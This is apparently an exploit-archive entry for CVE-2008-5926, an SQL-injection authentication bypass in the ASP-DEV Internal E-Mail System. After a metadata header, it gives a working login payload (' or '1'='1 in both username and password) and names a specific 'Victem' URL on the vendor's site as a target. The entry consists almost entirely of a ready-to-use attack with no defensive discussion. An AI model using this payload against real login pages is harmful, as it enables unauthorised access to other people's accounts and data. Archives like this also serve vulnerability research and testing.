ASP-DEV Internal E-Mail System - Authentication Bypass
Author: Pouya_Server
type: webapps
platform: asp
port:
date_added: 2008-12-13
date_updated: 2017-01-05
verified: 1
codes: OSVDB-50746;CVE-2008-5926
tags:
aliases:
screenshot_url:
application_url:
#########################################################
---------------------------------------------------------
Portal Name: Internal E-Mail System
Vendor : http://asp-dev.com/main.asp?page=41
Download : http://asp-dev.com/download.asp?did=4
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: ' or '1'='1
pass: ' or '1'='1
---------------------------------
Victem :
http://asp-dev.com/message
# milw0rm.com [2008-12-14]